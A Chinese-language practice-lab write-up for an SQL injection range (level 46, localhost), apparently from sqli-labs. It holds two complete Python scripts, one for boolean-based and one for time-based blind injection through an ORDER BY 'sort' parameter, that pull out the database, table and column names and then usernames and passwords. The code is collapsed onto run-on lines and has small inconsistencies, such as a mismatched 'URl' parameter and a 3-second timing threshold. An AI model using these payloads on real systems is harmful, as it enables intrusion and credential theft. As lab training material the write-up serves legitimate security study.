背景：因为order by ，limit无法使用预编译，所以有可能存在sql注入漏洞

以靶场第46关为例子

用python布尔盲注

import requests
from lxml import htmldef get_id_one(URL,paload):res = requests.get(url=URL,params=paload)tree = html.fromstring(res.content)id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()return id_onedef get_database(URL):# 获取数据库名称s = ""for i in range(1,10):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}#相当于第一个字符<={mid}条件判断为真id_one = get_id_one(URL,paload)if id_one=="1":hight = midmid = (low + hight) // 2else:low = mid +1mid = (low + hight) // 2s+=chr(mid)print("数据库名称:"+s)def get_table(URL):# 获取表名称s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL,paload)if id_one=="1":low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("表的名称:"+s)def get_column(URL):# 获取管理员的字段名称s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL,paload)if id_one=="1":low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("列的名称:"+s)def get_result(URl):# 获取用户名和密码信息s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL,paload)if id_one=="1":low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("用户名及密码信息:"+s)if __name__ == '__main__':URL = "http://localhost/Less-46/"# get_database(URL)# get_table(URL)# get_column(URL)get_result(URL)

结果

用python时间盲注

import requests
import datetimedef get_database(URL):# 获取数据库名称s = ""for i in range(1,10):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(0.2),id) -- "}#相当于第一个字符<={mid}条件判断为真start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >=3:hight = midmid = (low + hight) // 2else:low = mid +1mid = (low + hight) // 2print(chr(mid),mid)s+=chr(mid)print("数据库名称:"+s)def get_table(URL):# 获取表名称s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(0.2),id) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >=3:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("表的名称:"+s)def get_column(URL):# 获取管理员的字段名称s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(0.2),id) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >=3:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("列的名称:"+s)def get_result(URl):# 获取用户名和密码信息s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(0.2),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >=3:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("用户名及密码信息:"+s)if __name__ == '__main__':URL = "http://localhost/Less-46/"# get_database(URL)# get_table(URL)# get_column(URL)get_result(URL)

结果

注意使用时间盲注时，因为if是在order by之后，而order by 会遍历每一行，都会执行一遍sleep(),但是这里也不能用子查询，跟在order by 之后无论if的条件判断正确yufou都会执行子查询里面的sleep().